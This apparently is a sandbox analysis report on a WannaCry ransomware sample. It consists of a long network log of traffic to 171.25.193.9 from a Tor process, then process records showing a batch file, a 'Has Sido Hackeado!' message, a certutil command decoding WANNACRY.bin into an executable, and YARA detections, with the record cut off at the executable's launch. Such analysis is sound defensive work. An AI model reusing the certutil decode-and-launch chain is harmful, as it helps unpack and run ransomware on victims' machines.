                                                    May 15, 2023 09:31:20.861849070 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861884117 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861901045 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861915112 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861929893 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861944914 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861958981 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861974001 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861989975 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862004042 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862011909 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862011909 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862027884 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862042904 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862057924 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862060070 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862060070 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862078905 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862158060 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862169027 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862173080 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862174988 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862174988 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862176895 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862178087 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862189054 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862204075 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862221003 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862236023 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862251043 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862263918 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862272024 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862287045 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862301111 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862312078 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862312078 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862323999 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862339973 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862354994 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862360954 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862375975 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862390041 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862406015 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862410069 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862410069 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862427950 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862442970 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862458944 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862473965 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862492085 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862507105 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862509012 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862509012 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862529039 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862544060 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862556934 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862562895 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862579107 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862592936 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862606049 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862612963 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862627983 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862643003 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862656116 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862656116 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862668037 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862683058 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862698078 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862704039 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862718105 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862732887 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862746954 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862752914 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862767935 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862782955 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862797022 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862812996 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862828016 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862843037 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.862850904 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.862850904 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934350967 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934366941 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934374094 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934391975 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934405088 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934416056 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934432030 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934444904 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934444904 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934458017 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934473991 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934489965 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934493065 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934511900 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934528112 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934541941 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934550047 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934566975 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934582949 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934601068 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934617043 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934633970 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934640884 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934640884 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934640884 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934662104 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934678078 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934689045 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934700966 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934717894 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934734106 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934739113 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934739113 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934739113 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934762001 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934778929 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934797049 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934813976 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934829950 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934837103 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934837103 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934838057 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934838057 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934838057 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934864044 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934880018 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934897900 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934914112 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934930086 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934947014 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934962988 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.934966087 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.934983969 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935000896 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935014963 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935014963 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935024977 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935041904 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935058117 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935064077 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935080051 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935096025 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935113907 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935116053 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935116053 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935116053 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935139894 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935156107 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935163021 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935163021 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935163021 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935184002 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935199976 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935219049 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935235023 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935250998 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935266972 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935282946 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935291052 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935291052 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935323954 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935340881 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935343027 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935343027 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935343027 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935365915 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935381889 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935388088 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935404062 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935420036 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935437918 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935437918 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935481071 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935486078 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935535908 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935535908 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935584068 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935585022 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935601950 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935619116 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935632944 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935638905 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935656071 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935672045 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935688972 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935704947 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935731888 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935731888 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935731888 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935758114 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935774088 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935781002 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935781002 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935781002 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935801029 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935817003 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935828924 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935837984 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935853958 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935868979 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935878038 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935890913 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935906887 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935921907 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935939074 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935955048 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935970068 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.935977936 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935977936 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935977936 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935977936 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.935977936 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.936002970 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.936022997 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.936041117 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.936057091 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.936081886 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.936131001 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.936131001 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.936131954 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.936180115 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.936479092 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.936580896 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.936635971 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.936739922 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.968386889 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.968658924 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.968936920 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.969429970 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.969506025 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.969563961 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.969626904 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.969636917 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.969674110 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.969727039 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.969757080 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.969815969 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.969827890 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.969892979 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.969911098 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.969971895 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970027924 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970052958 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970104933 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970124006 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970171928 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970196009 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970253944 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970287085 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970333099 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970341921 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970407963 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970431089 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970478058 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970500946 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970557928 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970566034 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970630884 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970665932 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970665932 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970721960 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970772028 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970793962 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970849991 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970890045 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970925093 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.970963001 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.970963001 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.971014023 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971071959 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971087933 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.971148014 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971188068 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.971188068 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.971235991 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971291065 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971302986 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.971364021 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971400976 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.971441984 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971497059 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971509933 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.971594095 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971615076 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.971615076 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.971723080 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971779108 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971808910 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.971860886 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971867085 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.971935034 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.971940994 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972006083 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972048044 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972076893 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972134113 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972158909 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972212076 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972266912 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972302914 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972342968 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972356081 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972404003 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972434998 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972481966 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972507000 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972563028 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972580910 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972635984 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972671986 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972713947 CEST8049837171.25.193.9192.168.11.20
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    0 | 192.168.11.20 | 49837 | 171.25.193.9 | 80 | C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe



                                                    Target ID:0
                                                    Start time:09:27:53
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WannaCry.cmd" "
                                                    Imagebase:0x7ff66e380000
                                                    File size:289792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    Target ID:1
                                                    Start time:09:27:53
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:2
                                                    Start time:09:27:53
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\msg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:msg * Has Sido Hackeado!
                                                    Imagebase:0x7ff677d60000
                                                    File size:27136 bytes
                                                    MD5 hash:B42553599E40029366A0FD8F81079BED
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low

                                                    Target ID:4
                                                    Start time:09:28:57
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\certutil.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:certutil -decode "WANNACRY.bin" "WannaCrypt0r.sk"
                                                    Imagebase:0x7ff7fd680000
                                                    File size:1651200 bytes
                                                    MD5 hash:BD8D9943A9B1DEF98EB83E0FA48796C2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000003.2985145893.000001846EFA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000003.2985145893.000001846EFA7000.00000004.00000020.00020000.00000000.sdmp, Author: us-cert code analysis team
                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.2989666418.000001846CCE0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                    Reputation:moderate

                                                    Target ID:5
                                                    Start time:09:28:59
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                    Wow64 process (32bit):true
                                                    Commandline:WannaCrypt0r.sk
                                                    Imagebase:0x400000
                                                    File size:3514368 bytes
